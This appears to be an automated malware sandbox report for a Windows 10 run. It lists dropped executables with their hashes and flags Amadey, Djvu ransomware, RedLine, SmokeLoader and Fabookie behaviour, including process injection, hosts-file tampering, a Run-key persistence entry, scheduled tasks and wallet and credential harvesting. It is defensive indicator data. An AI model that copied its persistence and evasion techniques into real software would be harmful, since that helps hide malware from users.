SHA512 6cea1493cfb0343cf5c4d11bdbaf6f627944714dcddcf39581142b96200fa0c6cb44abb9b06a94117aa96f8fbbab4f8fdd450ea3d27f911fcc581b9e0b0a1219

C:\Users\Admin\AppData\Local\Temp\DD5B.exe

MD5 2475ec85193247eebd6fabd88ed25130
SHA1 da415fbf5ccedc8761b4438ac5818483e1b37fa9
SHA256 36711de0c30b8b0984d9848a18c0c78c6e7116df10e26bac1773c592cd395c8a
SHA512 6cea1493cfb0343cf5c4d11bdbaf6f627944714dcddcf39581142b96200fa0c6cb44abb9b06a94117aa96f8fbbab4f8fdd450ea3d27f911fcc581b9e0b0a1219

C:\Users\Admin\AppData\Roaming\btuisiv

MD5 23500d2528c34a2c75782a0fccbd880f
SHA1 5dc88f3f40c51489c1f7ae66d862d4047ef98a57
SHA256 2436580f50aa36271e880c712fbedd18fbcfe9d854274829301f67f782950305
SHA512 f8a6fea58f595c1843fc8418382a48cf81730c12212b52eb1f75be71cf72ae5b0d104608a34f3c072ee6fd01e84c74eeb58a9669a0c9d7df813e0fa9b169e66f

C:\Users\Admin\AppData\Local\Temp\F2A.exe

MD5 c2ca868ecfdd5ee7a6d4143890a29872
SHA1 004c581ea52c199b9aa3150f282aeb99d79104cc
SHA256 d440158b91d965693007b539131704b3bdd72e864b5adc1c0e230213acd3d97b
SHA512 2be918feea01882fe48cffd1df55a7cfe106f94dd20f6aa972728ddc00056aaabfd1fa493847844ac0746fd4b47818f284d4b4029d432330c0d8f60792e81ce2

C:\Users\Admin\AppData\Local\Temp\F2A.exe

MD5 c2ca868ecfdd5ee7a6d4143890a29872
SHA1 004c581ea52c199b9aa3150f282aeb99d79104cc
SHA256 d440158b91d965693007b539131704b3bdd72e864b5adc1c0e230213acd3d97b
SHA512 2be918feea01882fe48cffd1df55a7cfe106f94dd20f6aa972728ddc00056aaabfd1fa493847844ac0746fd4b47818f284d4b4029d432330c0d8f60792e81ce2

C:\Users\Admin\AppData\Local\Temp\5351.exe

MD5 2475ec85193247eebd6fabd88ed25130
SHA1 da415fbf5ccedc8761b4438ac5818483e1b37fa9
SHA256 36711de0c30b8b0984d9848a18c0c78c6e7116df10e26bac1773c592cd395c8a
SHA512 6cea1493cfb0343cf5c4d11bdbaf6f627944714dcddcf39581142b96200fa0c6cb44abb9b06a94117aa96f8fbbab4f8fdd450ea3d27f911fcc581b9e0b0a1219

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

MD5 1c667236b307c4f3912140e0210fb292
SHA1 beb87808f71804c1974e9157b7fa10ac8d90b406
SHA256 62fc619b0287ebbfb42a684815fef2eb55d2dc0233b8534338776b3208d275a0
SHA512 8f47740e7a81306294bc097672b83619eb4a7d61616f5a6fb39aebb1cccb38edd0169fc2af733cae013a8e22b067a12d1adaaa45c15a89e894e1349f2c98a4c3

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

MD5 f7dcb24540769805e5bb30d193944dce
SHA1 e26c583c562293356794937d9e2e6155d15449ee
SHA256 6b88c6ac55bbd6fea0ebe5a760d1ad2cfce251c59d0151a1400701cb927e36ea
SHA512 cb5ad678b0ef642bf492f32079fe77e8be20c02de267f04b545df346b25f3e4eb98bb568c4c2c483bb88f7d1826863cb515b570d620766e52476c8ee2931ea94

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D

MD5 802b7992b634b8cb8eae916015536e1b
SHA1 ddbf0933cf5e0051a3feaf6aa82de9008de71801
SHA256 16eded867e96946d4ed35ea0561457893a61ef11da70c3afb1570bd47e86bde3
SHA512 14f2fda7c57a8345bfcdc59692394b6c72b2d2a8c860f0f67c44cefbcdbff1e0a39a954fe7ab8b323302549a9ecf6ae7e15ef517a7eec933a56a704277a9828d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D

MD5 27a6981523fb99bedaf3f0213d40ce14
SHA1 a9ee004625620bf2f3cef361085793ab194dc65f
SHA256 8bee4786fdf1aced1f6c7f2126e5ac865d9e060e2ee4ae9b5fc9ecf06932d9ba
SHA512 68605e963980ffeff1b490d2cb83ff7621abd33ad02c3ed66e4e6ba6f965776a361e7486e09adee544b7d6c35224bc86644d6e4246fd3d2acff8999f7a2f38aa

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

MD5 cde3004d458a86374c76b63425fc9b8c
SHA1 91ed2720991b113dc6ee6b5705ec24b270e081df
SHA256 3851e2bff744375020167c2341984024cb6ee0e3d120685ad3e984125bb11447
SHA512 9ee9bd7550fb17ae13920ffd7a803727a35d823132f0fbe216d8bbbb09959cc673221d58e1f1b81909a634effedfb74ef29b3e0278a37590d2550db9b6d5cb5f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

MD5 8893aa4704488c9e37777a5ac5d4917e
SHA1 f54a3e28d3928d3a02c8581149243edbcd1dcfb6
SHA256 7af5e55c8f2c33f33fcc18743c687b52ae559a0a9b89b2dd5c7eb4577ad3168f
SHA512 15508b3a4ebe4133706595c3dce700fc99e54a9af86a25cd50fc8de3499a2af253c807945bb84726a3188e402aae39660a2066d6bd337f347bc5d6d267e1a032

C:\Users\Admin\AppData\Local\Temp\66BD.exe

MD5 9fa2359e60033bce831a4c5004e4e9f3
SHA1 ff4c3cd348e738dd29bf4e73163691e5d0396a9b
SHA256 78c6c2a433d690c77c16797cd2806d3eb83245de6110389da0611fcb6b336e09
SHA512 1cb5b58b3dfff1aa2b16eeb41c7d14bfcde59b948c34691abe55cf2986cff33137fa59627ed44f76f9a41a7ced6946c3f53aa82cb87041e09f5ee95472d44cc3

C:\Users\Admin\AppData\Local\Temp\741C.exe

MD5 9fa2359e60033bce831a4c5004e4e9f3
SHA1 ff4c3cd348e738dd29bf4e73163691e5d0396a9b
SHA256 78c6c2a433d690c77c16797cd2806d3eb83245de6110389da0611fcb6b336e09
SHA512 1cb5b58b3dfff1aa2b16eeb41c7d14bfcde59b948c34691abe55cf2986cff33137fa59627ed44f76f9a41a7ced6946c3f53aa82cb87041e09f5ee95472d44cc3

C:\Users\Admin\AppData\Local\Temp\7BED.exe

MD5 9fa2359e60033bce831a4c5004e4e9f3
SHA1 ff4c3cd348e738dd29bf4e73163691e5d0396a9b
SHA256 78c6c2a433d690c77c16797cd2806d3eb83245de6110389da0611fcb6b336e09
SHA512 1cb5b58b3dfff1aa2b16eeb41c7d14bfcde59b948c34691abe55cf2986cff33137fa59627ed44f76f9a41a7ced6946c3f53aa82cb87041e09f5ee95472d44cc3

C:\Users\Admin\AppData\Local\Temp\A6B8.exe

MD5 9fa2359e60033bce831a4c5004e4e9f3
SHA1 ff4c3cd348e738dd29bf4e73163691e5d0396a9b
SHA256 78c6c2a433d690c77c16797cd2806d3eb83245de6110389da0611fcb6b336e09
SHA512 1cb5b58b3dfff1aa2b16eeb41c7d14bfcde59b948c34691abe55cf2986cff33137fa59627ed44f76f9a41a7ced6946c3f53aa82cb87041e09f5ee95472d44cc3

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

MD5 9ead10c08e72ae41921191f8db39bc16
SHA1 abe3bce01cd34afc88e2c838173f8c2bd0090ae1
SHA256 8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0
SHA512 aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

C:\Users\Admin\AppData\Local\b0336122-c029-4316-b2ae-4e0ff6ceea31\build2.exe

MD5 304dcbfad357a684b36d2d639cdbc3eb
SHA1 428c58d8c86c49e28bc9958608817bf6a97dd780
SHA256 bd5aff6936d77e3deae4e45195b44ec5d4e7ba4f2a9dfe68ee7d6f7be2cfd97a
SHA512 8dd618a8a22c3e7f0f19287c6ca8135959f34f30a5d2e19f10f71c45a6b7c8c7dc0900b3e23c3ae479455cd1ce94a744c0841c26bde28f28ef8552130d465d43

C:\ProgramData\50799991933630022105233183

MD5 c9ff7748d8fcef4cf84a5501e996a641
SHA1 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA256 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512 d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

Analysis: behavioral3

Detonation Overview

Submitted

2023-08-07 11:48

Reported

2023-08-07 11:58

Platform

win10v2004-20230703-en

Max time kernel

600s

Max time network

602s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detected Djvu ransomware

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Djvu Ransomware

ransomware djvu

Fabookie

spyware stealer fabookie

RedLine

infostealer redline

SmokeLoader

trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 2180 created 3144 N/A C:\Users\Admin\AppData\Local\Temp\1000003001\latestX.exe C:\Windows\Explorer.EXE
PID 2180 created 3144 N/A C:\Users\Admin\AppData\Local\Temp\1000003001\latestX.exe C:\Windows\Explorer.EXE
PID 2180 created 3144 N/A C:\Users\Admin\AppData\Local\Temp\1000003001\latestX.exe C:\Windows\Explorer.EXE
PID 2180 created 3144 N/A C:\Users\Admin\AppData\Local\Temp\1000003001\latestX.exe C:\Windows\Explorer.EXE
PID 2180 created 3144 N/A C:\Users\Admin\AppData\Local\Temp\1000003001\latestX.exe C:\Windows\Explorer.EXE
PID 4360 created 3144 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE
PID 4360 created 3144 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE
PID 4360 created 3144 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE
PID 4360 created 3144 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE
PID 4360 created 3144 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE
PID 4360 created 3144 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE
PID 3988 created 3144 N/A C:\Windows\System32\conhost.exe C:\Windows\Explorer.EXE
PID 3988 created 3144 N/A C:\Windows\System32\conhost.exe C:\Windows\Explorer.EXE
PID 3988 created 3144 N/A C:\Windows\System32\conhost.exe C:\Windows\Explorer.EXE
PID 1616 created 3144 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE
PID 1616 created 3144 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE
PID 1616 created 3144 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE
PID 1616 created 3144 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\1000003001\latestX.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Program Files\Google\Chrome\updater.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Program Files\Google\Chrome\updater.exe N/A

Stops running service(s)

evasion

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\3302.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3D65.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\40B2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4268.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5AE3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5EFB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\61EA.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64AA.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6E21.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78EF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aafg31.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestplayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8F29.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\996B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9D73.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B949.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000003001\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C698.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\evuvcij N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3302.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64AA.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6E21.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5AE3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64AA.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78EF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6E21.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5AE3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78EF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B949.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8F29.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8F29.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3302.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78EF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6E21.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5AE3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64AA.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B949.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\5f01f9a3-a029-4b78-a1d3-9f0377fbc94e\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\a8de813c-c6c1-4451-8d11-24e090b0be78\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\ef8c009f-72cb-4cbf-ac69-3b3172b08118\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\5f01f9a3-a029-4b78-a1d3-9f0377fbc94e\build3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\a8de813c-c6c1-4451-8d11-24e090b0be78\build3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\ef8c009f-72cb-4cbf-ac69-3b3172b08118\build3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\ad558e8f-7aba-439b-b652-197b14c7f381\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\ad558e8f-7aba-439b-b652-197b14c7f381\build3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\a8de813c-c6c1-4451-8d11-24e090b0be78\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\5f01f9a3-a029-4b78-a1d3-9f0377fbc94e\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\ef8c009f-72cb-4cbf-ac69-3b3172b08118\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\ad558e8f-7aba-439b-b652-197b14c7f381\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8F29.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\8cbfee9f-7f10-422d-a15a-377685066034\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3302.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\8cbfee9f-7f10-422d-a15a-377685066034\build3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\8cbfee9f-7f10-422d-a15a-377685066034\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\12d9b32b-674f-4cac-ba38-55f5f5fac00b\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\12d9b32b-674f-4cac-ba38-55f5f5fac00b\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\12d9b32b-674f-4cac-ba38-55f5f5fac00b\build3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\09b38451-d3bf-4da3-abdc-ba2bde48b956\build2.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses 2FA software files, possible credential harvesting

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\a8e00b3b-feb7-4dae-ba08-83e179d90546\\3302.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\3302.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2244 set thread context of 852 N/A C:\Users\Admin\AppData\Local\Temp\3302.exe C:\Users\Admin\AppData\Local\Temp\3302.exe
PID 4328 set thread context of 3708 N/A C:\Users\Admin\AppData\Local\Temp\64AA.exe C:\Users\Admin\AppData\Local\Temp\64AA.exe
PID 3084 set thread context of 904 N/A C:\Users\Admin\AppData\Local\Temp\6E21.exe C:\Users\Admin\AppData\Local\Temp\6E21.exe
PID 1404 set thread context of 4484 N/A C:\Users\Admin\AppData\Local\Temp\5AE3.exe C:\Users\Admin\AppData\Local\Temp\5AE3.exe
PID 536 set thread context of 2000 N/A C:\Users\Admin\AppData\Local\Temp\78EF.exe C:\Users\Admin\AppData\Local\Temp\78EF.exe
PID 2184 set thread context of 4896 N/A N/A C:\Users\Admin\AppData\Local\Temp\B949.exe
PID 4308 set thread context of 5000 N/A C:\Users\Admin\AppData\Local\Temp\8F29.exe C:\Users\Admin\AppData\Local\Temp\8F29.exe
PID 1036 set thread context of 2196 N/A C:\Users\Admin\AppData\Local\Temp\78EF.exe C:\Users\Admin\AppData\Local\Temp\78EF.exe
PID 440 set thread context of 5064 N/A C:\Users\Admin\AppData\Local\Temp\6E21.exe C:\Users\Admin\AppData\Local\Temp\6E21.exe
PID 3848 set thread context of 4656 N/A C:\Users\Admin\AppData\Local\Temp\5AE3.exe C:\Users\Admin\AppData\Local\Temp\5AE3.exe
PID 816 set thread context of 4432 N/A C:\Users\Admin\AppData\Local\Temp\64AA.exe C:\Users\Admin\AppData\Local\Temp\64AA.exe
PID 3444 set thread context of 4628 N/A C:\Windows\System32\Conhost.exe C:\Users\Admin\AppData\Local\Temp\B949.exe
PID 4360 set thread context of 3988 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\System32\conhost.exe
PID 4360 set thread context of 2764 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\explorer.exe
PID 2060 set thread context of 5040 N/A C:\Users\Admin\AppData\Local\a8de813c-c6c1-4451-8d11-24e090b0be78\build2.exe C:\Users\Admin\AppData\Local\a8de813c-c6c1-4451-8d11-24e090b0be78\build2.exe
PID 2936 set thread context of 4620 N/A C:\Users\Admin\AppData\Local\5f01f9a3-a029-4b78-a1d3-9f0377fbc94e\build2.exe C:\Users\Admin\AppData\Local\5f01f9a3-a029-4b78-a1d3-9f0377fbc94e\build2.exe
PID 2428 set thread context of 4500 N/A C:\Users\Admin\AppData\Local\ef8c009f-72cb-4cbf-ac69-3b3172b08118\build2.exe C:\Users\Admin\AppData\Local\ef8c009f-72cb-4cbf-ac69-3b3172b08118\build2.exe
PID 2468 set thread context of 2248 N/A C:\Users\Admin\AppData\Local\ad558e8f-7aba-439b-b652-197b14c7f381\build2.exe C:\Users\Admin\AppData\Local\ad558e8f-7aba-439b-b652-197b14c7f381\build2.exe
PID 5068 set thread context of 4988 N/A C:\Users\Admin\AppData\Local\Temp\8F29.exe C:\Users\Admin\AppData\Local\Temp\8F29.exe
PID 3480 set thread context of 3180 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\Temp\3302.exe
PID 1096 set thread context of 3620 N/A C:\Users\Admin\AppData\Local\8cbfee9f-7f10-422d-a15a-377685066034\build2.exe C:\Users\Admin\AppData\Local\8cbfee9f-7f10-422d-a15a-377685066034\build2.exe
PID 1836 set thread context of 3716 N/A C:\Users\Admin\AppData\Local\12d9b32b-674f-4cac-ba38-55f5f5fac00b\build2.exe C:\Users\Admin\AppData\Local\12d9b32b-674f-4cac-ba38-55f5f5fac00b\build2.exe
PID 1348 set thread context of 744 N/A C:\Users\Admin\AppData\Local\09b38451-d3bf-4da3-abdc-ba2bde48b956\build2.exe C:\Users\Admin\AppData\Local\09b38451-d3bf-4da3-abdc-ba2bde48b956\build2.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\1000003001\latestX.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
